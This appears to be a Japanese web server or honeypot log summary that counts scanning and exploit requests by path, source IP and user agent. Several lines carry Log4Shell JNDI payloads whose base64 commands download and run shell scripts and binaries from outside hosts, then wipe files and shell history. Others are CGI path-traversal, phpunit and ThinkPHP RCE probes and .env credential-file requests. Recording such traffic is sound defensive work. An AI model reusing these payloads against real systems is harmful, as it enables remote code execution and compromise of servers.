1 GET /sql/phpmyadmin3/index.php?lang=en HTTP/1.1
2 GET /sql/sqladmin/index.php?lang=en HTTP/1.1
4 GET /sql/webadmin/index.php?lang=en HTTP/1.1
1 GET /sql/webdb/index.php?lang=en HTTP/1.1
2 GET /sqlmanager/index.php?lang=en HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en HTTP/1.1
1 HEAD /icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png HTTP/1.1
1 HEAD /icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png HTTP/1.1
1 HEAD /icons/.%2e/%2e%2e/apache2/icons/sphere1.png HTTP/1.1
1 HEAD /icons/sphere1.png HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /HNAP1/ HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
2 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
1 POST /seeyon/thirdpartyController.do HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
2 2.56.57.196 Netherlands
2 20.80.29.112 United States
1 20.106.245.199 United States
1 20.114.244.110 United States
1 34.75.220.108 United States
1 34.96.130.14 United States
1 36.37.140.88 Cambodia
2 45.137.21.134 Bangladesh
10 45.146.165.37 Russia
7 51.79.29.48 Canada
1 52.229.96.169 United States
2 61.219.11.151 Taiwan
1 67.222.158.177 United States
2 89.248.165.24 United Kingdom
2 94.232.43.63 Russia
2 104.196.98.126 United States
1 107.189.12.178 United States
3 107.189.28.51 United States
1 107.189.29.181 United States
1 109.237.103.9 Russia
1 109.237.103.123 Russia
1 116.68.101.1 India
4 128.14.141.34 United States
1 137.184.184.243 United States
1 139.162.145.250 Netherlands
2 157.230.216.203 United States
1 159.223.171.171 United States
1 159.223.191.129 United States
1 161.97.119.209 Germany
4 164.52.24.179 China
1 178.60.27.186 Spain
1 185.220.101.22 Germany
1 209.17.96.138 United States
1 209.141.54.110 United States

UserAgent一覧

件数 UserAgent
14 -
1 Hello, World
5 Mozila/5.0
1 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
1 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)
2 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
4 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
10 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
17 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2
1 t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//13[.]78[.]223[.]142:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaHR0cDovLzUxLjE2MS42NC4xOTgvaW5zdGFsbC5zaDsgY2htb2QgNzc3IGluc3RhbGwuc2g7IHNoIGluc3RhbGwuc2g=}')
1 t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//5[.]181[.]80[.]103:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IGN1cmwgaHR0cDovLzE0NS4yMzkuMjM0LjE1NC9iaW5zLnNoIC1vIGJpbnMuc2g7IHdnZXQgaHR0cDovLzE0NS4yMzkuMjM0LjE1NC9iaW5zLnNoOyBjaG1vZCA3NzcgYmlucy5zaDsgLi9iaW5zLnNoOyBybSAtcmYgYmlucy5zaDsgaGlzdG9yeSAtYw==}')
1 t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//5[.]181[.]80[.]103:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaHR0cDovLzUxLjE2MS42NC4xOTgvaW5zdGFsbC5zaDsgY2htb2QgNzc3IGluc3RhbGwuc2g7IHNoIGluc3RhbGwuc2g7IHRmdHAgNTEuMTYxLjY0LjE5OCAtYyBnZXQgdGZ0cDEuc2g7IGNobW9kIDc3NyB0ZnRwMS5zaDsgc2ggdGZ0cDEuc2g7IHRmdHAgLXIgdGZ0cDIuc2ggLWcgNTEuMTYxLjY0LjE5ODsgY2htb2QgNzc3IHRmdHAyLnNoOyBzaCB0ZnRwMi5zaDsgcm0gLXJmICo=}')
1 t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//5[.]181[.]80[.]103:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaHR0cDovLzUxLjE2MS42NC4xOTgvaW5zdGFsbC5zaDsgY2htb2QgNzc3IGluc3RhbGwuc2g7IHNoIGluc3RhbGwuc2g=}')
1 t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//5[.]181[.]80[.]103:1389/TomcatBypass/Command/Base64/Y3VybCBodHRwOi8vMTQ1LjIzOS4yMzQuMTU0L3NzaGQueDg2IC1vIHNzaGQueDg2OyB3Z2V0IGh0dHA6Ly8xNDUuMjM5LjIzNC4xNTQvc3NoZC54ODY7IGNobW9kIDc3NyBzc2hkLng4NjsgLi9zc2hkLng4Njsgcm0gLXJmIHNzaGQueDg2OyBoaXN0b3J5IC1j}')

リクエスト内容一覧

件数 Method Request Protocol
1 -
4 \x03
1 \x16\x03\x01\x01 \x01
5 \x16\x03\x01
1 CONNECT 161[.]97[.]119[.]209:85 HTTP/1.1
19 GET /.env HTTP/1.1
2 GET /:undefined HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
1 GET /?id=t(%27$%7B$%7Benv:BARFOO:-j%7Dndi$%7Benv:BARFOO:-:%7D$%7Benv:BARFOO:-l%7Ddap$%7Benv:BARFOO:-:%7D//5[.]181[.]80[.]103:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IGN1cmwgaHR0cDovLzE0NS4yMzkuMjM0LjE1NC9iaW5zLnNoIC1vIGJpbnMuc2g7IHdnZXQgaHR0cDovLzE0NS4yMzkuMjM0LjE1NC9iaW5zLnNoOyBjaG1vZCA3NzcgYmlucy5zaDsgLi9iaW5zLnNoOyBybSAtcmYgYmlucy5zaDsgaGlzdG9yeSAtYw==%7D%27) HTTP/1.1
1 GET /?id=t(%27$%7B$%7Benv:BARFOO:-j%7Dndi$%7Benv:BARFOO:-:%7D$%7Benv:BARFOO:-l%7Ddap$%7Benv:BARFOO:-:%7D//5[.]181[.]80[.]103:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaHR0cDovLzUxLjE2MS42NC4xOTgvaW5zdGFsbC5zaDsgY2htb2QgNzc3IGluc3RhbGwuc2g7IHNoIGluc3RhbGwuc2g7IHRmdHAgNTEuMTYxLjY0LjE5OCAtYyBnZXQgdGZ0cDEuc2g7IGNobW9kIDc3NyB0ZnRwMS5zaDsgc2ggdGZ0cDEuc2g7IHRmdHAgLXIgdGZ0cDIuc2ggLWcgNTEuMTYxLjY0LjE5ODsgY2htb2QgNzc3IHRmdHAyLnNoOyBzaCB0ZnRwMi5zaDsgcm0gLXJmICo=%7D%27) HTTP/1.1
1 GET /?id=t(%27$%7B$%7Benv:BARFOO:-j%7Dndi$%7Benv:BARFOO:-:%7D$%7Benv:BARFOO:-l%7Ddap$%7Benv:BARFOO:-:%7D//5[.]181[.]80[.]103:1389/TomcatBypass/Command/Base64/Y3VybCBodHRwOi8vMTQ1LjIzOS4yMzQuMTU0L3NzaGQueDg2IC1vIHNzaGQueDg2OyB3Z2V0IGh0dHA6Ly8xNDUuMjM5LjIzNC4xNTQvc3NoZC54ODY7IGNobW9kIDc3NyBzc2hkLng4NjsgLi9zc2hkLng4Njsgcm0gLXJmIHNzaGQueDg2OyBoaXN0b3J5IC1j%7D%27) HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /ab2g HTTP/1.1
1 GET /ab2h HTTP/1.1
1 GET /bag2 HTTP/1.1
1 GET /console/ HTTP/1.1
2 GET /dispatch.asp HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 HEAD /icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png HTTP/1.1
1 HEAD /icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png HTTP/1.1
1 HEAD /icons/.%2e/%2e%2e/apache2/icons/sphere1.png HTTP/1.1
1 HEAD /icons/sphere1.png HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
5 POST /HNAP1/ HTTP/1.1
2 POST /boaform/admin/formLogin HTTP/1.1
1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
1 POST /result%3Fhl%3Den%26meta%3Dvvnwppnloxhwtqccppbyhqmrwyswqen HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1